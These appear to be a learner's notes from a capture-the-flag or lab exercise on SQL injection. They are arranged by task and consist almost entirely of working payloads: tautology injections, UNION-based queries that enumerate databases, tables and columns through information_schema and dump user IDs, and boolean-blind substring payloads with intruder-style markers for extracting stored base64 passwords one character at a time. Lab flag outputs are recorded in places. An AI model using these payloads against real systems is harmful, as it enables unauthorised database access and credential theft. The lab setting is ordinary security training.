SQL ingection

task 12

GET /?id=1'%20or%20'1'%3d'1 HTTP/1.1

id=1' or 1=1

task 13 (union based SQL injection)

123' UNION SELECT  1,database()#

123' UNION SELECT  1,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES#

ID:1
First flag: user_variables
ID:1
First flag: users

123' UNION SELECT  1,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="users"#

ID:1
First flag: id
ID:1
First flag: name


123' UNION SELECT 1,id FROM users#

ID:1
First flag: 1947442647

task 14 

0 or 1=1

0 or 1=1 union select 3,5
0 or 1=1 union select all database(),5

0 or 1=1 union select column_name,1 from information_schema.columns where table_schema=database()

0 or 1=1 union select TABLE_NAME,1 FROM INFORMATION_SCHEMA.TABLES where table_schema=database()

0 or 1=1 union select name,1 from users4escape



BLIND SQL INGECTION (TRUE/FALSE)

check=%2B12345678910' order by 1; -- -

check=%2B12345678910' or substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),§1§,1)='§a§'; -- -
check=%2B12345678910' or substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),§1§,1)='§a§'; -- -

check=%2B12345678910' or substring((select column_name from information_schema.columns where table_name='orders' limit 0,1),§1§,1)='§a§'; -- -
check=%2B12345678910' or substring((select column_name from information_schema.columns where table_name='passwords' limit 1,1),§1§,1)='§a§'; -- -

check=%2B12345678910' or substring((select descr from orders limit 3,1),§1§,1)='§a§'; -- -

not case-sensitive:
check=%2B12345678910' or substring((select base64_pw from passwords limit 0,1),§1§,1)='§a§'; -- -

case-sensitive:
check=%2B12345678910' or ASCII(substring((select base64_pw from passwords limit 3,1),30,1))=ASCII('Q'); --
